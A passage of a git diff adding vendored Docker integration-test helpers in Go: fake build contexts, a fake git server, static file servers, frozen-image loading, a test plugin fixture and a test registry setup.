+	return os.RemoveAll(fp)
+}
+
+// Close deletes the context
+func (f *Fake) Close() error {
+	return os.RemoveAll(f.Dir)
+}
+
+// AsTarReader returns a ReadCloser with the contents of Dir as a tar archive.
+func (f *Fake) AsTarReader(t testingT) io.ReadCloser {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	reader, err := archive.TarWithOptions(f.Dir, &archive.TarOptions{})
+	if err != nil {
+		t.Fatalf("Failed to create tar from %s: %s", f.Dir, err)
+	}
+	return reader
+}
diff --git a/vendor/github.com/docker/docker/internal/test/fakegit/fakegit.go b/vendor/github.com/docker/docker/internal/test/fakegit/fakegit.go
new file mode 100644
index 0000000000..605d1baaa8
--- /dev/null
+++ b/vendor/github.com/docker/docker/internal/test/fakegit/fakegit.go
@@ -0,0 +1,136 @@
+package fakegit // import "github.com/docker/docker/internal/test/fakegit"
+
+import (
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"net/http/httptest"
+	"os"
+	"os/exec"
+	"path/filepath"
+
+	"github.com/docker/docker/internal/test"
+	"github.com/docker/docker/internal/test/fakecontext"
+	"github.com/docker/docker/internal/test/fakestorage"
+	"gotest.tools/assert"
+)
+
+type testingT interface {
+	assert.TestingT
+	logT
+	skipT
+	Fatal(args ...interface{})
+	Fatalf(string, ...interface{})
+}
+
+type logT interface {
+	Logf(string, ...interface{})
+}
+
+type skipT interface {
+	Skip(reason string)
+}
+
+type gitServer interface {
+	URL() string
+	Close() error
+}
+
+type localGitServer struct {
+	*httptest.Server
+}
+
+func (r *localGitServer) Close() error {
+	r.Server.Close()
+	return nil
+}
+
+func (r *localGitServer) URL() string {
+	return r.Server.URL
+}
+
+// FakeGit is a fake git server
+type FakeGit struct {
+	root    string
+	server  gitServer
+	RepoURL string
+}
+
+// Close closes the server, implements Closer interface
+func (g *FakeGit) Close() {
+	g.server.Close()
+	os.RemoveAll(g.root)
+}
+
+// New create a fake git server that can be used for git related tests
+func New(c testingT, name string, files map[string]string, enforceLocalServer bool) *FakeGit {
+	if ht, ok := c.(test.HelperT); ok {
+		ht.Helper()
+	}
+	ctx := fakecontext.New(c, "", fakecontext.WithFiles(files))
+	defer ctx.Close()
+	curdir, err := os.Getwd()
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer os.Chdir(curdir)
+
+	if output, err := exec.Command("git", "init", ctx.Dir).CombinedOutput(); err != nil {
+		c.Fatalf("error trying to init repo: %s (%s)", err, output)
+	}
+	err = os.Chdir(ctx.Dir)
+	if err != nil {
+		c.Fatal(err)
+	}
+	if output, err := exec.Command("git", "config", "user.name", "Fake User").CombinedOutput(); err != nil {
+		c.Fatalf("error trying to set 'user.name': %s (%s)", err, output)
+	}
+	if output, err := exec.Command("git", "config", "user.email", "fake.user@example.com").CombinedOutput(); err != nil {
+		c.Fatalf("error trying to set 'user.email': %s (%s)", err, output)
+	}
+	if output, err := exec.Command("git", "add", "*").CombinedOutput(); err != nil {
+		c.Fatalf("error trying to add files to repo: %s (%s)", err, output)
+	}
+	if output, err := exec.Command("git", "commit", "-a", "-m", "Initial commit").CombinedOutput(); err != nil {
+		c.Fatalf("error trying to commit to repo: %s (%s)", err, output)
+	}
+
+	root, err := ioutil.TempDir("", "docker-test-git-repo")
+	if err != nil {
+		c.Fatal(err)
+	}
+	repoPath := filepath.Join(root, name+".git")
+	if output, err := exec.Command("git", "clone", "--bare", ctx.Dir, repoPath).CombinedOutput(); err != nil {
+		os.RemoveAll(root)
+		c.Fatalf("error trying to clone --bare: %s (%s)", err, output)
+	}
+	err = os.Chdir(repoPath)
+	if err != nil {
+		os.RemoveAll(root)
+		c.Fatal(err)
+	}
+	if output, err := exec.Command("git", "update-server-info").CombinedOutput(); err != nil {
+		os.RemoveAll(root)
+		c.Fatalf("error trying to git update-server-info: %s (%s)", err, output)
+	}
+	err = os.Chdir(curdir)
+	if err != nil {
+		os.RemoveAll(root)
+		c.Fatal(err)
+	}
+
+	var server gitServer
+	if !enforceLocalServer {
+		// use fakeStorage server, which might be local or remote (at test daemon)
+		server = fakestorage.New(c, root)
+	} else {
+		// always start a local http server on CLI test machine
+		httpServer := httptest.NewServer(http.FileServer(http.Dir(root)))
+		server = &localGitServer{httpServer}
+	}
+	return &FakeGit{
+		root:    root,
+		server:  server,
+		RepoURL: fmt.Sprintf("%s/%s.git", server.URL(), name),
+	}
+}
diff --git a/vendor/github.com/docker/docker/internal/test/fakestorage/fixtures.go b/vendor/github.com/docker/docker/internal/test/fakestorage/fixtures.go
new file mode 100644
index 0000000000..ad8f763143
--- /dev/null
+++ b/vendor/github.com/docker/docker/internal/test/fakestorage/fixtures.go
@@ -0,0 +1,92 @@
+package fakestorage // import "github.com/docker/docker/internal/test/fakestorage"
+
+import (
+	"context"
+	"io"
+	"io/ioutil"
+	"os"
+	"os/exec"
+	"path/filepath"
+	"sync"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/internal/test"
+	"github.com/docker/docker/pkg/archive"
+	"gotest.tools/assert"
+)
+
+var ensureHTTPServerOnce sync.Once
+
+func ensureHTTPServerImage(t testingT) {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	var doIt bool
+	ensureHTTPServerOnce.Do(func() {
+		doIt = true
+	})
+
+	if !doIt {
+		return
+	}
+
+	defer testEnv.ProtectImage(t, "httpserver:latest")
+
+	tmp, err := ioutil.TempDir("", "docker-http-server-test")
+	if err != nil {
+		t.Fatalf("could not build http server: %v", err)
+	}
+	defer os.RemoveAll(tmp)
+
+	goos := testEnv.OSType
+	if goos == "" {
+		goos = "linux"
+	}
+	goarch := os.Getenv("DOCKER_ENGINE_GOARCH")
+	if goarch == "" {
+		goarch = "amd64"
+	}
+
+	cpCmd, lookErr := exec.LookPath("cp")
+	if lookErr != nil {
+		t.Fatalf("could not build http server: %v", lookErr)
+	}
+
+	if _, err = os.Stat("../contrib/httpserver/httpserver"); os.IsNotExist(err) {
+		goCmd, lookErr := exec.LookPath("go")
+		if lookErr != nil {
+			t.Fatalf("could not build http server: %v", lookErr)
+		}
+
+		cmd := exec.Command(goCmd, "build", "-o", filepath.Join(tmp, "httpserver"), "github.com/docker/docker/contrib/httpserver")
+		cmd.Env = append(os.Environ(), []string{
+			"CGO_ENABLED=0",
+			"GOOS=" + goos,
+			"GOARCH=" + goarch,
+		}...)
+		var out []byte
+		if out, err = cmd.CombinedOutput(); err != nil {
+			t.Fatalf("could not build http server: %s", string(out))
+		}
+	} else {
+		if out, err := exec.Command(cpCmd, "../contrib/httpserver/httpserver", filepath.Join(tmp, "httpserver")).CombinedOutput(); err != nil {
+			t.Fatalf("could not copy http server: %v", string(out))
+		}
+	}
+
+	if out, err := exec.Command(cpCmd, "../contrib/httpserver/Dockerfile", filepath.Join(tmp, "Dockerfile")).CombinedOutput(); err != nil {
+		t.Fatalf("could not build http server: %v", string(out))
+	}
+
+	c := testEnv.APIClient()
+	reader, err := archive.TarWithOptions(tmp, &archive.TarOptions{})
+	assert.NilError(t, err)
+	resp, err := c.ImageBuild(context.Background(), reader, types.ImageBuildOptions{
+		Remove:      true,
+		ForceRemove: true,
+		Tags:        []string{"httpserver"},
+	})
+	assert.NilError(t, err)
+	_, err = io.Copy(ioutil.Discard, resp.Body)
+	assert.NilError(t, err)
+}
diff --git a/vendor/github.com/docker/docker/internal/test/fakestorage/storage.go b/vendor/github.com/docker/docker/internal/test/fakestorage/storage.go
new file mode 100644
index 0000000000..b091cbc3f1
--- /dev/null
+++ b/vendor/github.com/docker/docker/internal/test/fakestorage/storage.go
@@ -0,0 +1,200 @@
+package fakestorage // import "github.com/docker/docker/internal/test/fakestorage"
+
+import (
+	"context"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"net/http"
+	"net/http/httptest"
+	"net/url"
+	"os"
+	"strings"
+
+	"github.com/docker/docker/api/types"
+	containertypes "github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/client"
+	"github.com/docker/docker/internal/test"
+	"github.com/docker/docker/internal/test/environment"
+	"github.com/docker/docker/internal/test/fakecontext"
+	"github.com/docker/docker/internal/test/request"
+	"github.com/docker/docker/internal/testutil"
+	"github.com/docker/go-connections/nat"
+	"gotest.tools/assert"
+)
+
+var testEnv *environment.Execution
+
+type testingT interface {
+	assert.TestingT
+	logT
+	skipT
+	Fatal(args ...interface{})
+	Fatalf(string, ...interface{})
+}
+
+type logT interface {
+	Logf(string, ...interface{})
+}
+
+type skipT interface {
+	Skip(reason string)
+}
+
+// Fake is a static file server. It might be running locally or remotely
+// on test host.
+type Fake interface {
+	Close() error
+	URL() string
+	CtxDir() string
+}
+
+// SetTestEnvironment sets a static test environment
+// TODO: decouple this package from environment
+func SetTestEnvironment(env *environment.Execution) {
+	testEnv = env
+}
+
+// New returns a static file server that will be use as build context.
+func New(t testingT, dir string, modifiers ...func(*fakecontext.Fake) error) Fake {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	if testEnv == nil {
+		t.Fatal("fakstorage package requires SetTestEnvironment() to be called before use.")
+	}
+	ctx := fakecontext.New(t, dir, modifiers...)
+	switch {
+	case testEnv.IsRemoteDaemon() && strings.HasPrefix(request.DaemonHost(), "unix:///"):
+		t.Skip(fmt.Sprintf("e2e run : daemon is remote but docker host points to a unix socket"))
+	case testEnv.IsLocalDaemon():
+		return newLocalFakeStorage(ctx)
+	default:
+		return newRemoteFileServer(t, ctx, testEnv.APIClient())
+	}
+	return nil
+}
+
+// localFileStorage is a file storage on the running machine
+type localFileStorage struct {
+	*fakecontext.Fake
+	*httptest.Server
+}
+
+func (s *localFileStorage) URL() string {
+	return s.Server.URL
+}
+
+func (s *localFileStorage) CtxDir() string {
+	return s.Fake.Dir
+}
+
+func (s *localFileStorage) Close() error {
+	defer s.Server.Close()
+	return s.Fake.Close()
+}
+
+func newLocalFakeStorage(ctx *fakecontext.Fake) *localFileStorage {
+	handler := http.FileServer(http.Dir(ctx.Dir))
+	server := httptest.NewServer(handler)
+	return &localFileStorage{
+		Fake:   ctx,
+		Server: server,
+	}
+}
+
+// remoteFileServer is a containerized static file server started on the remote
+// testing machine to be used in URL-accepting docker build functionality.
+type remoteFileServer struct {
+	host      string // hostname/port web server is listening to on docker host e.g. 0.0.0.0:43712
+	container string
+	image     string
+	client    client.APIClient
+	ctx       *fakecontext.Fake
+}
+
+func (f *remoteFileServer) URL() string {
+	u := url.URL{
+		Scheme: "http",
+		Host:   f.host}
+	return u.String()
+}
+
+func (f *remoteFileServer) CtxDir() string {
+	return f.ctx.Dir
+}
+
+func (f *remoteFileServer) Close() error {
+	defer func() {
+		if f.ctx != nil {
+			f.ctx.Close()
+		}
+		if f.image != "" {
+			if _, err := f.client.ImageRemove(context.Background(), f.image, types.ImageRemoveOptions{
+				Force: true,
+			}); err != nil {
+				fmt.Fprintf(os.Stderr, "Error closing remote file server : %v\n", err)
+			}
+		}
+		if err := f.client.Close(); err != nil {
+			fmt.Fprintf(os.Stderr, "Error closing remote file server : %v\n", err)
+		}
+	}()
+	if f.container == "" {
+		return nil
+	}
+	return f.client.ContainerRemove(context.Background(), f.container, types.ContainerRemoveOptions{
+		Force:         true,
+		RemoveVolumes: true,
+	})
+}
+
+func newRemoteFileServer(t testingT, ctx *fakecontext.Fake, c client.APIClient) *remoteFileServer {
+	var (
+		image     = fmt.Sprintf("fileserver-img-%s", strings.ToLower(testutil.GenerateRandomAlphaOnlyString(10)))
+		container = fmt.Sprintf("fileserver-cnt-%s", strings.ToLower(testutil.GenerateRandomAlphaOnlyString(10)))
+	)
+
+	ensureHTTPServerImage(t)
+
+	// Build the image
+	if err := ctx.Add("Dockerfile", `FROM httpserver
+COPY . /static`); err != nil {
+		t.Fatal(err)
+	}
+	resp, err := c.ImageBuild(context.Background(), ctx.AsTarReader(t), types.ImageBuildOptions{
+		NoCache: true,
+		Tags:    []string{image},
+	})
+	assert.NilError(t, err)
+	_, err = io.Copy(ioutil.Discard, resp.Body)
+	assert.NilError(t, err)
+
+	// Start the container
+	b, err := c.ContainerCreate(context.Background(), &containertypes.Config{
+		Image: image,
+	}, &containertypes.HostConfig{}, nil, container)
+	assert.NilError(t, err)
+	err = c.ContainerStart(context.Background(), b.ID, types.ContainerStartOptions{})
+	assert.NilError(t, err)
+
+	// Find out the system assigned port
+	i, err := c.ContainerInspect(context.Background(), b.ID)
+	assert.NilError(t, err)
+	newP, err := nat.NewPort("tcp", "80")
+	assert.NilError(t, err)
+	ports, exists := i.NetworkSettings.Ports[newP]
+	if !exists || len(ports) != 1 {
+		t.Fatalf("unable to find port 80/tcp for %s", container)
+	}
+	host := ports[0].HostIP
+	port := ports[0].HostPort
+
+	return &remoteFileServer{
+		container: container,
+		image:     image,
+		host:      fmt.Sprintf("%s:%s", host, port),
+		ctx:       ctx,
+		client:    c,
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/fixtures/load/frozen.go b/vendor/github.com/docker/docker/internal/test/fixtures/load/frozen.go
similarity index 60%
rename from vendor/github.com/docker/docker/integration-cli/fixtures/load/frozen.go
rename to vendor/github.com/docker/docker/internal/test/fixtures/load/frozen.go
index 13cd393f36..94f3680f95 100644
--- a/vendor/github.com/docker/docker/integration-cli/fixtures/load/frozen.go
+++ b/vendor/github.com/docker/docker/internal/test/fixtures/load/frozen.go
@@ -1,29 +1,33 @@
-package load
+package load // import "github.com/docker/docker/internal/test/fixtures/load"
 
 import (
 	"bufio"
 	"bytes"
+	"context"
 	"os"
 	"os/exec"
 	"path/filepath"
 	"strings"
 	"sync"
 
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/client"
+	"github.com/docker/docker/pkg/jsonmessage"
+	"github.com/docker/docker/pkg/term"
 	"github.com/pkg/errors"
 )
 
-var frozenImgDir = "/docker-frozen-images"
+const frozenImgDir = "/docker-frozen-images"
 
 // FrozenImagesLinux loads the frozen image set for the integration suite
 // If the images are not available locally it will download them
 // TODO: This loads whatever is in the frozen image dir, regardless of what
 // images were passed in. If the images need to be downloaded, then it will respect
 // the passed in images
-func FrozenImagesLinux(dockerBinary string, images ...string) error {
-	imgNS := os.Getenv("TEST_IMAGE_NAMESPACE")
+func FrozenImagesLinux(client client.APIClient, images ...string) error {
 	var loadImages []struct{ srcName, destName string }
 	for _, img := range images {
-		if err := exec.Command(dockerBinary, "inspect", "--type=image", img).Run(); err != nil {
+		if !imageExists(client, img) {
 			srcName := img
 			// hello-world:latest gets re-tagged as hello-world:frozen
 			// there are some tests that use hello-world:latest specifically so it pulls
@@ -32,9 +36,6 @@ func FrozenImagesLinux(dockerBinary string, images ...string) error {
 			if img == "hello-world:frozen" {
 				srcName = "hello-world:latest"
 			}
-			if imgNS != "" {
-				srcName = imgNS + "/" + srcName
-			}
 			loadImages = append(loadImages, struct{ srcName, destName string }{
 				srcName:  srcName,
 				destName: img,
@@ -46,35 +47,41 @@ func FrozenImagesLinux(dockerBinary string, images ...string) error {
 		return nil
 	}
 
+	ctx := context.Background()
 	fi, err := os.Stat(frozenImgDir)
 	if err != nil || !fi.IsDir() {
 		srcImages := make([]string, 0, len(loadImages))
 		for _, img := range loadImages {
 			srcImages = append(srcImages, img.srcName)
 		}
-		if err := pullImages(dockerBinary, srcImages); err != nil {
+		if err := pullImages(ctx, client, srcImages); err != nil {
 			return errors.Wrap(err, "error pulling image list")
 		}
 	} else {
-		if err := loadFrozenImages(dockerBinary); err != nil {
+		if err := loadFrozenImages(ctx, client); err != nil {
 			return err
 		}
 	}
 
 	for _, img := range loadImages {
 		if img.srcName != img.destName {
-			if out, err := exec.Command(dockerBinary, "tag", img.srcName, img.destName).CombinedOutput(); err != nil {
-				return errors.Errorf("%v: %s", err, string(out))
+			if err := client.ImageTag(ctx, img.srcName, img.destName); err != nil {
+				return errors.Wrapf(err, "failed to tag %s as %s", img.srcName, img.destName)
 			}
-			if out, err := exec.Command(dockerBinary, "rmi", img.srcName).CombinedOutput(); err != nil {
-				return errors.Errorf("%v: %s", err, string(out))
+			if _, err := client.ImageRemove(ctx, img.srcName, types.ImageRemoveOptions{}); err != nil {
+				return errors.Wrapf(err, "failed to remove %s", img.srcName)
 			}
 		}
 	}
 	return nil
 }
 
-func loadFrozenImages(dockerBinary string) error {
+func imageExists(client client.APIClient, name string) bool {
+	_, _, err := client.ImageInspectWithRaw(context.Background(), name)
+	return err == nil
+}
+
+func loadFrozenImages(ctx context.Context, client client.APIClient) error {
 	tar, err := exec.LookPath("tar")
 	if err != nil {
 		return errors.Wrap(err, "could not find tar binary")
@@ -90,15 +97,16 @@ func loadFrozenImages(dockerBinary string) error {
 	tarCmd.Start()
 	defer tarCmd.Wait()
 
-	cmd := exec.Command(dockerBinary, "load")
-	cmd.Stdin = out
-	if out, err := cmd.CombinedOutput(); err != nil {
-		return errors.Errorf("%v: %s", err, string(out))
+	resp, err := client.ImageLoad(ctx, out, true)
+	if err != nil {
+		return errors.Wrap(err, "failed to load frozen images")
 	}
-	return nil
+	defer resp.Body.Close()
+	fd, isTerminal := term.GetFdInfo(os.Stdout)
+	return jsonmessage.DisplayJSONMessagesStream(resp.Body, os.Stdout, fd, isTerminal, nil)
 }
 
-func pullImages(dockerBinary string, images []string) error {
+func pullImages(ctx context.Context, client client.APIClient, images []string) error {
 	cwd, err := os.Getwd()
 	if err != nil {
 		return errors.Wrap(err, "error getting path to dockerfile")
@@ -119,16 +127,8 @@ func pullImages(dockerBinary string, images []string) error {
 		wg.Add(1)
 		go func(tag, ref string) {
 			defer wg.Done()
-			if out, err := exec.Command(dockerBinary, "pull", ref).CombinedOutput(); err != nil {
-				chErr <- errors.Errorf("%v: %s", string(out), err)
-				return
-			}
-			if out, err := exec.Command(dockerBinary, "tag", ref, tag).CombinedOutput(); err != nil {
-				chErr <- errors.Errorf("%v: %s", string(out), err)
-				return
-			}
-			if out, err := exec.Command(dockerBinary, "rmi", ref).CombinedOutput(); err != nil {
-				chErr <- errors.Errorf("%v: %s", string(out), err)
+			if err := pullTagAndRemove(ctx, client, ref, tag); err != nil {
+				chErr <- err
 				return
 			}
 		}(tag, ref)
@@ -138,6 +138,25 @@ func pullImages(dockerBinary string, images []string) error {
 	return <-chErr
 }
 
+func pullTagAndRemove(ctx context.Context, client client.APIClient, ref string, tag string) error {
+	resp, err := client.ImagePull(ctx, ref, types.ImagePullOptions{})
+	if err != nil {
+		return errors.Wrapf(err, "failed to pull %s", ref)
+	}
+	defer resp.Close()
+	fd, isTerminal := term.GetFdInfo(os.Stdout)
+	if err := jsonmessage.DisplayJSONMessagesStream(resp, os.Stdout, fd, isTerminal, nil); err != nil {
+		return err
+	}
+
+	if err := client.ImageTag(ctx, ref, tag); err != nil {
+		return errors.Wrapf(err, "failed to tag %s as %s", ref, tag)
+	}
+	_, err = client.ImageRemove(ctx, ref, types.ImageRemoveOptions{})
+	return errors.Wrapf(err, "failed to remove %s", ref)
+
+}
+
 func readFrozenImageList(dockerfilePath string, images []string) (map[string]string, error) {
 	f, err := os.Open(dockerfilePath)
 	if err != nil {
@@ -156,11 +175,6 @@ func readFrozenImageList(dockerfilePath string, images []string) (map[string]str
 			continue
 		}
 
-		frozenImgDir = line[2]
-		if line[2] == frozenImgDir {
-			frozenImgDir = filepath.Join(os.Getenv("DEST"), "frozen-images")
-		}
-
 		for scanner.Scan() {
 			img := strings.TrimSpace(scanner.Text())
 			img = strings.TrimSuffix(img, "\\")
diff --git a/vendor/github.com/docker/docker/internal/test/fixtures/plugin/basic/basic.go b/vendor/github.com/docker/docker/internal/test/fixtures/plugin/basic/basic.go
new file mode 100644
index 0000000000..892272826f
--- /dev/null
+++ b/vendor/github.com/docker/docker/internal/test/fixtures/plugin/basic/basic.go
@@ -0,0 +1,34 @@
+package main
+
+import (
+	"fmt"
+	"net"
+	"net/http"
+	"os"
+	"path/filepath"
+)
+
+func main() {
+	p, err := filepath.Abs(filepath.Join("run", "docker", "plugins"))
+	if err != nil {
+		panic(err)
+	}
+	if err := os.MkdirAll(p, 0755); err != nil {
+		panic(err)
+	}
+	l, err := net.Listen("unix", filepath.Join(p, "basic.sock"))
+	if err != nil {
+		panic(err)
+	}
+
+	mux := http.NewServeMux()
+	server := http.Server{
+		Addr:    l.Addr().String(),
+		Handler: http.NewServeMux(),
+	}
+	mux.HandleFunc("/Plugin.Activate", func(w http.ResponseWriter, r *http.Request) {
+		w.Header().Set("Content-Type", "application/vnd.docker.plugins.v1.1+json")
+		fmt.Println(w, `{"Implements": ["dummy"]}`)
+	})
+	server.Serve(l)
+}
diff --git a/vendor/github.com/docker/docker/internal/test/fixtures/plugin/plugin.go b/vendor/github.com/docker/docker/internal/test/fixtures/plugin/plugin.go
new file mode 100644
index 0000000000..523a261ad2
--- /dev/null
+++ b/vendor/github.com/docker/docker/internal/test/fixtures/plugin/plugin.go
@@ -0,0 +1,216 @@
+package plugin // import "github.com/docker/docker/internal/test/fixtures/plugin"
+
+import (
+	"context"
+	"encoding/json"
+	"io"
+	"io/ioutil"
+	"os"
+	"os/exec"
+	"path/filepath"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/plugin"
+	"github.com/docker/docker/registry"
+	"github.com/pkg/errors"
+)
+
+// CreateOpt is is passed used to change the default plugin config before
+// creating it
+type CreateOpt func(*Config)
+
+// Config wraps types.PluginConfig to provide some extra state for options
+// extra customizations on the plugin details, such as using a custom binary to
+// create the plugin with.
+type Config struct {
+	*types.PluginConfig
+	binPath string
+}
+
+// WithBinary is a CreateOpt to set an custom binary to create the plugin with.
+// This binary must be statically compiled.
+func WithBinary(bin string) CreateOpt {
+	return func(cfg *Config) {
+		cfg.binPath = bin
+	}
+}
+
+// CreateClient is the interface used for `BuildPlugin` to interact with the
+// daemon.
+type CreateClient interface {
+	PluginCreate(context.Context, io.Reader, types.PluginCreateOptions) error
+}
+
+// Create creates a new plugin with the specified name
+func Create(ctx context.Context, c CreateClient, name string, opts ...CreateOpt) error {
+	tmpDir, err := ioutil.TempDir("", "create-test-plugin")
+	if err != nil {
+		return err
+	}
+	defer os.RemoveAll(tmpDir)
+
+	tar, err := makePluginBundle(tmpDir, opts...)
+	if err != nil {
+		return err
+	}
+	defer tar.Close()
+
+	ctx, cancel := context.WithTimeout(ctx, 30*time.Second)
+	defer cancel()
+
+	return c.PluginCreate(ctx, tar, types.PluginCreateOptions{RepoName: name})
+}
+
+// CreateInRegistry makes a plugin (locally) and pushes it to a registry.
+// This does not use a dockerd instance to create or push the plugin.
+// If you just want to create a plugin in some daemon, use `Create`.
+//
+// This can be useful when testing plugins on swarm where you don't really want
+// the plugin to exist on any of the daemons (immediately) and there needs to be
+// some way to distribute the plugin.
+func CreateInRegistry(ctx context.Context, repo string, auth *types.AuthConfig, opts ...CreateOpt) error {
+	tmpDir, err := ioutil.TempDir("", "create-test-plugin-local")
+	if err != nil {
+		return err
+	}
+	defer os.RemoveAll(tmpDir)
+
+	inPath := filepath.Join(tmpDir, "plugin")
+	if err := os.MkdirAll(inPath, 0755); err != nil {
+		return errors.Wrap(err, "error creating plugin root")
+	}
+
+	tar, err := makePluginBundle(inPath, opts...)
+	if err != nil {
+		return err
+	}
+	defer tar.Close()
+
+	dummyExec := func(m *plugin.Manager) (plugin.Executor, error) {
+		return nil, nil
+	}
+
+	regService, err := registry.NewService(registry.ServiceOptions{V2Only: true})
+	if err != nil {
+		return err
+	}
+
+	managerConfig := plugin.ManagerConfig{
+		Store:           plugin.NewStore(),
+		RegistryService: regService,
+		Root:            filepath.Join(tmpDir, "root"),
+		ExecRoot:        "/run/docker", // manager init fails if not set
+		CreateExecutor:  dummyExec,
+		LogPluginEvent:  func(id, name, action string) {}, // panics when not set
+	}
+	manager, err := plugin.NewManager(managerConfig)
+	if err != nil {
+		return errors.Wrap(err, "error creating plugin manager")
+	}
+
+	ctx, cancel := context.WithTimeout(ctx, 30*time.Second)
+	defer cancel()
+	if err := manager.CreateFromContext(ctx, tar, &types.PluginCreateOptions{RepoName: repo}); err != nil {
+		return err
+	}
+
+	if auth == nil {
+		auth = &types.AuthConfig{}
+	}
+	err = manager.Push(ctx, repo, nil, auth, ioutil.Discard)
+	return errors.Wrap(err, "error pushing plugin")
+}
+
+func makePluginBundle(inPath string, opts ...CreateOpt) (io.ReadCloser, error) {
+	p := &types.PluginConfig{
+		Interface: types.PluginConfigInterface{
+			Socket: "basic.sock",
+			Types:  []types.PluginInterfaceType{{Capability: "docker.dummy/1.0"}},
+		},
+		Entrypoint: []string{"/basic"},
+	}
+	cfg := &Config{
+		PluginConfig: p,
+	}
+	for _, o := range opts {
+		o(cfg)
+	}
+	if cfg.binPath == "" {
+		binPath, err := ensureBasicPluginBin()
+		if err != nil {
+			return nil, err
+		}
+		cfg.binPath = binPath
+	}
+
+	configJSON, err := json.Marshal(p)
+	if err != nil {
+		return nil, err
+	}
+	if err := ioutil.WriteFile(filepath.Join(inPath, "config.json"), configJSON, 0644); err != nil {
+		return nil, err
+	}
+	if err := os.MkdirAll(filepath.Join(inPath, "rootfs", filepath.Dir(p.Entrypoint[0])), 0755); err != nil {
+		return nil, errors.Wrap(err, "error creating plugin rootfs dir")
+	}
+
+	// Ensure the mount target paths exist
+	for _, m := range p.Mounts {
+		var stat os.FileInfo
+		if m.Source != nil {
+			stat, err = os.Stat(*m.Source)
+			if err != nil && !os.IsNotExist(err) {
+				return nil, err
+			}
+		}
+
+		if stat == nil || stat.IsDir() {
+			var mode os.FileMode = 0755
+			if stat != nil {
+				mode = stat.Mode()
+			}
+			if err := os.MkdirAll(filepath.Join(inPath, "rootfs", m.Destination), mode); err != nil {
+				return nil, errors.Wrap(err, "error preparing plugin mount destination path")
+			}
+		} else {
+			if err := os.MkdirAll(filepath.Join(inPath, "rootfs", filepath.Dir(m.Destination)), 0755); err != nil {
+				return nil, errors.Wrap(err, "error preparing plugin mount destination dir")
+			}
+			f, err := os.Create(filepath.Join(inPath, "rootfs", m.Destination))
+			if err != nil && !os.IsExist(err) {
+				return nil, errors.Wrap(err, "error preparing plugin mount destination file")
+			}
+			if f != nil {
+				f.Close()
+			}
+		}
+	}
+	if err := archive.NewDefaultArchiver().CopyFileWithTar(cfg.binPath, filepath.Join(inPath, "rootfs", p.Entrypoint[0])); err != nil {
+		return nil, errors.Wrap(err, "error copying plugin binary to rootfs path")
+	}
+	tar, err := archive.Tar(inPath, archive.Uncompressed)
+	return tar, errors.Wrap(err, "error making plugin archive")
+}
+
+func ensureBasicPluginBin() (string, error) {
+	name := "docker-basic-plugin"
+	p, err := exec.LookPath(name)
+	if err == nil {
+		return p, nil
+	}
+
+	goBin, err := exec.LookPath("go")
+	if err != nil {
+		return "", err
+	}
+	installPath := filepath.Join(os.Getenv("GOPATH"), "bin", name)
+	sourcePath := filepath.Join("github.com", "docker", "docker", "internal", "test", "fixtures", "plugin", "basic")
+	cmd := exec.Command(goBin, "build", "-o", installPath, sourcePath)
+	cmd.Env = append(cmd.Env, "GOPATH="+os.Getenv("GOPATH"), "CGO_ENABLED=0")
+	if out, err := cmd.CombinedOutput(); err != nil {
+		return "", errors.Wrapf(err, "error building basic plugin bin: %s", string(out))
+	}
+	return installPath, nil
+}
diff --git a/vendor/github.com/docker/docker/internal/test/helper.go b/vendor/github.com/docker/docker/internal/test/helper.go
new file mode 100644
index 0000000000..1b9fd75090
--- /dev/null
+++ b/vendor/github.com/docker/docker/internal/test/helper.go
@@ -0,0 +1,6 @@
+package test
+
+// HelperT is a subset of testing.T that implements the Helper function
+type HelperT interface {
+	Helper()
+}
diff --git a/vendor/github.com/docker/docker/internal/test/registry/ops.go b/vendor/github.com/docker/docker/internal/test/registry/ops.go
new file mode 100644
index 0000000000..c004f37424
--- /dev/null
+++ b/vendor/github.com/docker/docker/internal/test/registry/ops.go
@@ -0,0 +1,26 @@
+package registry
+
+// Schema1 sets the registry to serve v1 api
+func Schema1(c *Config) {
+	c.schema1 = true
+}
+
+// Htpasswd sets the auth method with htpasswd
+func Htpasswd(c *Config) {
+	c.auth = "htpasswd"
+}
+
+// Token sets the auth method to token, with the specified token url
+func Token(tokenURL string) func(*Config) {
+	return func(c *Config) {
+		c.auth = "token"
+		c.tokenURL = tokenURL
+	}
+}
+
+// URL sets the registry url
+func URL(registryURL string) func(*Config) {
+	return func(c *Config) {
+		c.registryURL = registryURL
+	}
+}
diff --git a/vendor/github.com/docker/docker/internal/test/registry/registry.go b/vendor/github.com/docker/docker/internal/test/registry/registry.go
new file mode 100644
index 0000000000..b6128d3ba4
--- /dev/null
+++ b/vendor/github.com/docker/docker/internal/test/registry/registry.go
@@ -0,0 +1,255 @@
+package registry // import "github.com/docker/docker/internal/test/registry"
+
+import (
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"os"
+	"os/exec"
+	"path/filepath"
+	"time"
+
+	"github.com/docker/docker/internal/test"
+	"github.com/opencontainers/go-digest"
+	"gotest.tools/assert"
+)
+
+const (
+	// V2binary is the name of the registry v2 binary
+	V2binary = "registry-v2"
+	// V2binarySchema1 is the name of the registry that serve schema1
+	V2binarySchema1 = "registry-v2-schema1"
+	// DefaultURL is the default url that will be used by the registry (if not specified otherwise)
+	DefaultURL = "127.0.0.1:5000"
+)
+
+type testingT interface {
+	assert.TestingT
+	logT
+	Fatal(...interface{})
+	Fatalf(string, ...interface{})
+}
+
+type logT interface {
+	Logf(string, ...interface{})
+}
+
+// V2 represent a registry version 2
+type V2 struct {
+	cmd         *exec.Cmd
+	registryURL string
+	dir         string
+	auth        string
+	username    string
+	password    string
+	email       string
+}
+
+// Config contains the test registry configuration
+type Config struct {
+	schema1     bool
+	auth        string
+	tokenURL    string
+	registryURL string
+}
+
+// NewV2 creates a v2 registry server
+func NewV2(t testingT, ops ...func(*Config)) *V2 {
